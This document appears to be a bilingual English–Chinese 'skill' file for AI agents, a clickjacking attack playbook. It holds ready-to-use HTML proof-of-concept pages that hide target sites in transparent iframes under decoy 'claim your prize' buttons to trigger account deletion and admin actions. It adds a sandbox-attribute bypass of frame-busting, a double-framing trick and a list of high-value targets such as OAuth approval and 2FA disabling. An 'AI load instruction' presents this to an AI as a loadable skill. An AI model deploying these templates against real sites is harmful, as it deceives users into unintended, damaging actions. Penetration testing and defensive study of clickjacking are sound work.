Back to Details

clickjacking

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: Clickjacking — Expert Attack Playbook

SKILL: Clickjacking — 专家攻击手册

AI LOAD INSTRUCTION: Clickjacking (UI redress) techniques. Covers iframe transparency tricks, X-Frame-Options bypass, CSP frame-ancestors, multi-step clickjacking, drag-and-drop attacks, and chaining with other vulnerabilities. Often a "low severity" finding that becomes critical when targeting admin actions.
AI加载说明:包含Clickjacking(UI界面伪装)技术,涵盖iframe透明化技巧、X-Frame-Options绕过、CSP frame-ancestors相关操作、多步点击劫持、拖拽攻击,以及与其他漏洞的链式利用。通常这类漏洞被判定为“低危”,但当目标是管理员操作时会变为严重漏洞。

1. CORE CONCEPT

1. 核心概念

Clickjacking loads a target page in a transparent iframe overlaid on an attacker's page. The victim sees the attacker's UI but clicks on the invisible target page, performing unintended actions.
html
<style>
  iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; z-index: 2; }
  .decoy { position: absolute; top: 200px; left: 100px; z-index: 1; }
</style>
<div class="decoy"><button>Click to win a prize!</button></div>
<iframe src="https://target.com/account/delete?confirm=yes"></iframe>
Clickjacking 是将目标页面加载到透明iframe中,覆盖在攻击者的页面之上。受害者看到的是攻击者的UI,但实际点击的是不可见的目标页面,从而执行非预期操作。
html
<style>
  iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; z-index: 2; }
  .decoy { position: absolute; top: 200px; left: 100px; z-index: 1; }
</style>
<div class="decoy"><button>Click to win a prize!</button></div>
<iframe src="https://target.com/account/delete?confirm=yes"></iframe>

2. DETECTION — IS THE PAGE FRAMEABLE?

2. 检测 — 页面是否可被嵌入?

Check X-Frame-Options Header

检查 X-Frame-Options 响应头

X-Frame-Options: DENY           → cannot be framed (secure)
X-Frame-Options: SAMEORIGIN     → only same-origin framing (secure for cross-origin)
X-Frame-Options: ALLOW-FROM uri → deprecated, browser support inconsistent
(header absent)                  → frameable! (vulnerable)
X-Frame-Options: DENY           → 不可被嵌入(安全)
X-Frame-Options: SAMEORIGIN     → 仅允许同域嵌入(跨域场景下安全)
X-Frame-Options: ALLOW-FROM uri → 已废弃,浏览器支持不一致
(无该响应头)                  → 可被嵌入!(存在漏洞)

Check CSP frame-ancestors

检查 CSP frame-ancestors

Content-Security-Policy: frame-ancestors 'none'        → cannot be framed
Content-Security-Policy: frame-ancestors 'self'         → same-origin only
Content-Security-Policy: frame-ancestors https://a.com  → specific origin
(directive absent)                                       → frameable
CSP frame-ancestors supersedes X-Frame-Options in modern browsers.
Content-Security-Policy: frame-ancestors 'none'        → 不可被嵌入
Content-Security-Policy: frame-ancestors 'self'         → 仅允许同域嵌入
Content-Security-Policy: frame-ancestors https://a.com  → 允许指定来源嵌入
(无该指令)                                       → 可被嵌入
在现代浏览器中,CSP frame-ancestors 优先级高于 X-Frame-Options

Quick PoC Test

快速PoC测试

html
<iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe>
If the page loads in the iframe → frameable → potentially vulnerable.
html
<iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe>
如果页面可以在iframe中加载 → 可被嵌入 → 可能存在漏洞。

JavaScript Frame Detection (from target page source)

JavaScript 框架检测(来自目标页面源码)

javascript
// Common frame-busting code found in target pages:
if (top.location.hostname !== self.location.hostname) {
    top.location.href = self.location.href;
}
If this code is present but not using CSP 
frame-ancestors
, it can often be bypassed.
javascript
// 目标页面中常见的框架阻断代码:
if (top.location.hostname !== self.location.hostname) {
    top.location.href = self.location.href;
}
如果存在这段代码但未使用CSP 
frame-ancestors
,通常可以被绕过。

3. PROOF OF CONCEPT TEMPLATES

3. 概念验证模板

Basic Single-Click

基础单点击

html
<html>
<head><title>Free Prize</title></head>
<body>
<h1>Click the button to claim your prize!</h1>
<style>
  iframe { position: absolute; top: 300px; left: 60px;
           width: 500px; height: 200px; opacity: 0.0001; z-index: 2; }
</style>
<iframe src="https://target.com/account/settings?action=delete"></iframe>
</body>
</html>
html
<html>
<head><title>Free Prize</title></head>
<body>
<h1>Click the button to claim your prize!</h1>
<style>
  iframe { position: absolute; top: 300px; left: 60px;
           width: 500px; height: 200px; opacity: 0.0001; z-index: 2; }
</style>
<iframe src="https://target.com/account/settings?action=delete"></iframe>
</body>
</html>

Multi-Step Clickjacking

多步点击劫持

For actions requiring multiple clicks (e.g., "Are you sure?" confirmation):
html
<div id="step1">
  <button onclick="document.getElementById('step1').style.display='none';
                    document.getElementById('step2').style.display='block';">
    Step 1: Click here
  </button>
</div>
<div id="step2" style="display:none">
  <button>Step 2: Confirm</button>
</div>
<iframe src="https://target.com/admin/action"></iframe>
Reposition iframe for each step to align the transparent button with the decoy.
针对需要多次点击的操作(例如“你确定吗?”确认步骤):
html
<div id="step1">
  <button onclick="document.getElementById('step1').style.display='none';
                    document.getElementById('step2').style.display='block';">
    Step 1: Click here
  </button>
</div>
<div id="step2" style="display:none">
  <button>Step 2: Confirm</button>
</div>
<iframe src="https://target.com/admin/action"></iframe>
每一步重新定位iframe,让透明按钮和诱饵按钮对齐。

Drag-and-Drop Clickjacking

拖拽点击劫持

Extract data from one iframe to another using HTML5 drag-and-drop events — the victim drags across invisible iframes, transferring tokens or data.
利用HTML5拖拽事件将数据从一个iframe提取到另一个iframe——受害者在不可见的iframe之间拖拽,会传输令牌或其他数据。

4. BYPASS TECHNIQUES

4. 绕过技术

Frame-Busting Script Bypass

框架阻断脚本绕过

Some pages use JavaScript frame-busting:
javascript
if (top !== self) { top.location = self.location; }
Bypass with sandbox attribute:
html
<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->
部分页面使用JavaScript实现框架阻断:
javascript
if (top !== self) { top.location = self.location; }
使用sandbox属性绕过
html
<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe>
<!-- sandbox without allow-top-navigation prevents frame-busting -->

X-Frame-Options ALLOW-FROM Bypass

X-Frame-Options ALLOW-FROM 绕过

ALLOW-FROM
is not supported in Chrome/Safari. If the server relies solely on 
ALLOW-FROM
, modern browsers ignore it → page is frameable.
ALLOW-FROM
在Chrome/Safari中不受支持。如果服务器仅依赖
ALLOW-FROM
配置,现代浏览器会忽略该配置 → 页面可被嵌入。

Double-Framing

双框架绕过

If 
X-Frame-Options: SAMEORIGIN
is set, but a same-origin page exists that can be framed (without XFO), use that page as an intermediary to frame the target.
如果设置了
X-Frame-Options: SAMEORIGIN
,但存在一个同域页面可被嵌入(无XFO配置),可以使用该页面作为中间层嵌入目标页面。

5. HIGH-IMPACT TARGETS

5. 高影响目标

text
Account deletion page
Email/password change form
Admin panel actions (add user, change role)
Payment confirmation
OAuth authorization ("Allow" button)
Two-factor authentication disable
API key generation
Webhook configuration
text
账户删除页面
邮箱/密码修改表单
管理面板操作(新增用户、修改角色)
支付确认
OAuth授权(“允许”按钮)
双因素认证关闭
API密钥生成
Webhook配置

6. TESTING CHECKLIST

6. 测试检查清单

□ Check X-Frame-Options header on sensitive pages
□ Check CSP frame-ancestors directive
□ Create iframe PoC and verify page loads
□ Test frame-busting scripts — try sandbox attribute bypass
□ Identify high-value single-click actions
□ For multi-step actions, build multi-click PoC
□ Test both authenticated and unauthenticated pages
□ Verify ALLOW-FROM behavior across browsers
□ 检查敏感页面的X-Frame-Options响应头
□ 检查CSP frame-ancestors指令
□ 编写iframe PoC验证页面是否可加载
□ 测试框架阻断脚本 — 尝试使用sandbox属性绕过
□ 识别高价值的单点击操作
□ 针对多步操作,构建多点击PoC
□ 同时测试已认证和未认证页面
□ 验证不同浏览器下ALLOW-FROM的行为